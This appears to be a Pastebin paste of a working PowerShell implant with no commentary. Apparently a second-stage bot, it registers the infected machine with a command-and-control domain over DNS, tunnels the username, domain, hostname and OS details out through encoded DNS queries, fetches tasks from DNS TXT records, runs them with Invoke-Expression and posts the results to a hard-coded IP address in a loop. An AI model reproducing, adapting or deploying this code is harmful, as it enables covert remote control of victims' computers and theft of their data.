Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # This section should be ommited as it is present in Stager
- # =============================================================================
- $domains = @("hellobot.fun")
- function Pick-Domain {
- Param($DomainList)
- if ($DomainList.count -eq 1) {
- return $DomainList
- }
- return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)]
- }
- function Identify-Machine() {
- $serial = Get-WmiObject Win32_BIOS | Select -ExpandProperty SerialNumber
- $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
- $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($serial)) | foreach { $_.ToString("X2") }) -join ""
- return $hash.Substring(0, 10)
- }
- function Try-Domains {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$DomainList, [Parameter()][scriptblock]$Action)
- if ($DomainList.count -eq 0) {
- Throw "No domains"
- }
- $domain = Pick-Domain $DomainList
- try {
- return $Action.Invoke($domain)
- } Catch {
- return Try-Domains ($DomainList | Where-Object { $_ βne $domain }) $Action
- }
- }
- function Do-DNS {
- [CmdletBinding()]
- param([Parameter()]$dns, [Parameter()]$type)
- Write-Debug "[DNS] (${type}) ==> ${dns}"
- $data = Resolve-DnsName -Type $type $dns -ErrorAction Stop -DnsOnly -Debug:$false -Server 212.32.242.146
- return $data
- }
- function Do-DNS-TXT {
- [CmdletBinding()]
- param([Parameter()]$dns, [Parameter()]$type)
- return (Do-DNS $dns $type | Select -ExpandProperty Strings) -join ''
- }
- function Decode-String {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Code)
- Write-Debug "Decode-Str: $Code"
- $gzipBytes = [System.Convert]::FromBase64String($Code)
- $codeBytes = Get-DecompressedByteArray($gzipBytes)
- return [system.Text.Encoding]::UTF8.GetString($codeBytes)
- }
- # =============================================================================
- function Get-CompressedByteArray {
- [CmdletBinding()]
- Param (
- [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
- [byte[]] $byteArray = $(Throw("-byteArray is required"))
- )
- Process {
- Write-Verbose "Get-CompressedByteArray"
- [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
- $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
- $gzipStream.Write( $byteArray, 0, $byteArray.Length )
- $gzipStream.Close()
- $output.Close()
- $tmp = $output.ToArray()
- Write-Output $tmp
- }
- }
- function Get-DecompressedByteArray {
- [CmdletBinding()]
- Param (
- [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
- [byte[]] $byteArray = $(Throw("-byteArray is required"))
- )
- Process {
- Write-Verbose "Get-DecompressedByteArray"
- $input = New-Object System.IO.MemoryStream( , $byteArray )
- $output = New-Object System.IO.MemoryStream
- $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
- $gzipStream.CopyTo( $output )
- $gzipStream.Close()
- $input.Close()
- [byte[]] $byteOutArray = $output.ToArray()
- Write-Output $byteOutArray
- }
- }
- function Encode-Base58{
- [CmdletBinding()]
- param([Parameter()]$bytes)
- $base58digits = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
- # get big int representation
- $dBig = New-Object System.Numerics.BigInteger 0
- $bytes | %{ $dBig = $dBig * 256 + $_ }
- # combine into string
- $result = [System.String]::Empty
- while ($dBig -gt 0) {
- $rem = $dBig % 58
- $dBig /= 58
- $result = $base58digits[$rem] + $result
- }
- foreach ($b in $bytes) {
- if ($b -ne 0) { break }
- $result = '1' + $result
- }
- return $result
- }
- function Encode-Data{
- [CmdletBinding()]
- param([Parameter()]$data)
- $bytes = [system.Text.Encoding]::UTF8.GetBytes($data)
- $gzipbytes = Get-CompressedByteArray $bytes
- $b58bytes = Encode-Base58 $gzipbytes
- $split = ([regex]::matches($b58bytes, '.{1,63}') | %{$_.value}) -join '.'
- return $split
- }
- function Encode-HTTP-Data {
- [CmdletBinding()]
- param([Parameter()]$data)
- $bytes = [system.Text.Encoding]::UTF8.GetBytes($data)
- $gzipbytes = Get-CompressedByteArray $bytes
- return [System.Convert]::ToBase64String($gzipbytes)
- }
- # =============================================================================
- function Register-Bot {
- [CmdletBinding()]
- param([Parameter()]$DomainList)
- $regSuccess = Try-Domains $DomainList {
- return Do-DNS-TXT "$(Identify-Machine).add.$domain" TXT
- }
- if ($regSuccess -ne "1") {
- throw "Bad registration"
- }
- }
- function Execute-Dict {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Data)
- $output = @{}
- $Data.GetEnumerator() | % {
- $val = try { Exec-Timeout $_.value } catch { "Failure" }
- $output[$_.key] = $val
- }
- return $output
- }
- function Do-Bad-Job {
- [CmdletBinding()]
- param([Parameter()]$DomainList, [Parameter()]$Data)
- Execute-Dict $Data | %{$_.GetEnumerator()} | %{
- try {
- $letter = $_.key
- $sdata = $_.value
- $enc = Encode-Data $sdata
- Write-Debug "[General data] ${letter}: ${sdata} => ${enc}"
- Try-Domains $DomainList {
- $response = Do-DNS "${enc}.${letter}.$(Identify-Machine).i.$domain" A | Select -ExpandProperty IPAddress
- if ($response -ne '1.1.1.1') {
- Throw 'Bad response 3'
- }
- }
- } catch {
- Write-Debug "[General data] Unable to send ${letters}"
- }
- }
- Write-Debug "[General data] Complete"
- }
- function Read-Mode {
- [CmdletBinding()]
- param([Parameter()]$DomainList)
- return Try-Domains $DomainList {
- return Do-DNS-TXT "$(Identify-Machine).mx1.$domain" TXT
- }
- }
- function Get-WWW-PS {
- [CmdletBinding()]
- param([Parameter()]$DomainList)
- return Try-Domains $DomainList {
- Write-Host $domain
- return Do-DNS-TXT "$(Identify-Machine).www.$domain" TXT | Decode-String
- }
- }
- function Send-HTTP-Data {
- [CmdletBinding()]
- param([Parameter()]$DomainList, [Parameter()]$data)
- # encode data
- $encdata = Encode-HTTP-Data $data
- $myData = @{"hwid" = $(Identify-Machine); "data" = $data | ConvertTo-Json -Depth 4}
- $myData["data"] | Out-String
- try {
- Invoke-WebRequest -Uri "http://212.32.242.146/index.php?r=bot-result%2Findex" -Body $myData -Method POST
- #Invoke-WebRequest -UseBasicParsing http://212.32.242.146/index.php?r=bot-result%2Findex -ContentType "application/json" -Method POST -Body "{ 'hwid':$myData["hwid"], 'data':$myData["data"]}"
- } catch {
- Write-Host "StatusCode:" $_.Exception.Response.StatusCode.value__
- Write-Host "StatusDescription:" $_.Exception.Response.StatusDescription
- }
- #return Try-Domains $DomainList {
- # Write-Debug "[HTTP] ===> http://$(Identify-Machine).http.$domain"
- # #return Invoke-WebRequest -Uri "http://$(Identify-Machine).http.$domain" -Body $data -Method POST
- # return Invoke-WebRequest -Uri "http://212.32.242.146/index.php?r=bot-result%2Findex" -Body $myData -Method POST
- #}
- }
- function Main-Loop {
- [CmdletBinding()]
- param([Parameter()]$DomainList)
- Write-Host "Main start"
- while (1) {
- # get mode
- $mode = Read-Mode $domains
- $interval = 0
- switch ($mode){
- '3' { break }
- '0' { $interval = 30*60 }
- '1' { $interval = 12*60*60 }
- }
- Write-Host "Interval mode: $mode"
- try {
- # NO www=exit HANDLING
- $data = Get-Tasks $DomainList
- $taskType = ''
- $data_new = @{}
- (ConvertFrom-Json $data).psobject.properties | Foreach { if ($_.Name -ne 'taskType' ) { $data_new[$_.Name] = $_.Value} else {$taskType = $_.Value} }
- $data = Execute-Dict $data_new
- $data['taskType'] = $taskType
- Write-Debug "[Main-Loop] Data: ${data}"
- # convert to dictionary if not a dictionary
- if ($data -isnot [System.Collections.IDictionary]){
- $data = @{'response'=$data}
- }
- # if not OK code -- exception
- Send-HTTP-Data $DomainList $data
- } catch {
- Write-Debug "[Main-Loop] Execution crashed"
- Write-Host $Error[0]
- }
- Write-Debug "[Main-Loop] Start sleeping for ${interval}s"
- Start-Sleep -s $interval
- }
- }
- function Exec-Timeout {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)][string]$command)
- $timeoutSeconds = 10
- $val = "failure"
- Write-Host $command
- $code = {
- param($c)
- Invoke-Expression $c
- }
- $j = Start-Job -ScriptBlock $code -ArgumentList $command
- if (Wait-Job $j -Timeout $timeoutSeconds) {
- $val = Receive-Job $j
- }
- Remove-Job -force $j
- return $val
- }
- function Get-Tasks {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$DomainList)
- $stage = ''
- $domain = Pick-Domain $DomainList
- $partStage = 0
- $dns = "$(Identify-Machine).www.$partStage.$domain"
- $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
- while ($dnsResponseA -ne '0.0.0.0') {
- $bigInt = Ip-To-Long $dnsResponseA
- $bin = To-Bin-Number $bigInt
- $dnsResponseTXT = (Do-DNS $dns TXT | Select -ExpandProperty Strings) -join ''
- $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
- $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($dnsResponseTXT)) | foreach { $_.ToString("X2") }) -join ""
- $txtHex = [string]$hash[0] + [string]$hash[1] + [string]$hash[2] + [string]$hash[3] + [string]$hash[4] + [string]$hash[5] + [string]$hash[6] + [string]$hash[7]
- $txtInt = Hex-To-Int $txtHex
- $txtBin = To-Bin-Number $txtInt
- if ([string]$bin -eq [string]$txtBin) {
- $stage += $dnsResponseTXT
- $domain = Pick-Domain $DomainList
- $partStage++
- }
- $dns = "$(Identify-Machine).www.$partStage.$domain"
- $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
- }
- return [string]$stage | Decode-String
- }
- $baseData = @{
- 'u'='$env:username'
- 'd'='$env:userdomain'
- 'o'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty Caption'
- 'h'='hostname'
- 'a'='1'
- 'org'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty Organization | %{if ([string]::IsNullOrEmpty($_)) {"NoOrg"} else {$_}}'
- 'arc'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty OSArchitecture'
- }
- try {
- [Console]::OutputEncoding = [Text.UTF8Encoding]::UTF8
- } catch {
- Write-Host $Error[0]
- }
- try {
- # register bot
- Register-Bot $domains
- # send data
- Do-Bad-Job $domains $baseData
- # enter main loop
- Main-Loop $domains
- } catch {
- Write-Debug $Error[0]
- }
Add Comment
Please, Sign In to add comment